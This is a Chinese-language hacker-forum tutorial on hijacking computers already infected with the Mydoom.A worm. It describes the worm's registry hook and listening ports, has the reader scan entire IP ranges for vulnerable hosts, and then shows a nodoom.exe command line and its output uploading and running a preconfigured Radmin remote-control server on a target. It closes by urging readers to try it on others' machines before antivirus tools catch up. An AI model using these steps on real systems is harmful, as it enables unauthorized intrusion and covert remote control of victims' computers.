您现在的位置: 主页 > 黑客联盟 > QQ黑客软件 > 文章内容

黑客技术利用课程进行mydoom.A蠕虫溢出

作者: 黑客联盟 来源:未知 时间: 2013-05-17 阅读:
 QQ黑客基地 www.2425.net首先大家来简单了解一下这个病毒。Mydoom.a的后门以dll形式存在的,通过修改注册表相应键值,将自己加载到资源管理器的进程空间中。将正常情况下的注册表:
HKEY_CLASSES_ROOT\\CLSID\\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\\InProcServer32
    <NO NAME>   REG_EXPAND_SZ   %SystemRoot%\\System32\\webcheck.dll
    ThreadingModel      REG_SZ  Apartment
的%SystemRoot%\\System32\\webcheck.dll替换成自己的shimgapi.dll。默认情况下,shimgapi.dll后门监听3127端口,如果该端口被占用,则递增,但不大于3198。

该后门提供了两个功能:
1、作为端口转发代理
2、作为后门,接收程序上传并执行。(本次入侵就是利用这个)

ok,可以了,我们开工吧。

    首先用专用扫描工具w32.mydoon.scanner扫描器对网段21x.xx.0.1-21x.xx.255.255进行扫描,扫描到显示VULNERABLE的而且端口为3127的,就是可以溢出的。1080端口的机器是在执行Mydoom.a后门的第一个功能。

     在命令行运行sPiKie编译的溢出程序nodoom.exe
K:\\mydoor\\tools>nodoom
***************************************************
***** MyDoom.A Upload/Exec Backdoor by sPiKie *****
**** Usage: nodoom <ip> <port> <program to upload> **
***************************************************

使用格式:nodoom 目标ip 目标的端口 上传并运行的程序 
 
   在这里我的目标是21x.xx.xxx.xx1,这里端口是3127,我上传的后门程序是配置好了的radmin的被控端winsvc.exe,当然你可以选择别的你喜欢的后门。开刀了!

K:\\mydoor\\tools>nodoom 21x.xx.xxx.xx1 3127 winsvc.exe
[+] Opening File
[+] File found ready to send
[+] Connected
[+] Sending executable.
......................................................
......................................................
................................[+]All done,server have
 now executed your executable!

K:\\mydoor\\tools>

溢出成功,打开radmin连接肉鸡,呵呵xp的。剩下的就干你喜欢的去吧!

    想试试身手的朋友就快快行动哦,对windows98-2003的系统都适合哦,要不等杀毒软件对mydoom.A大开杀戒的时候,恐怕就只有到病毒化石馆见它了。

文章来自 QQ黑客技术 www.2425.net 明升门户网站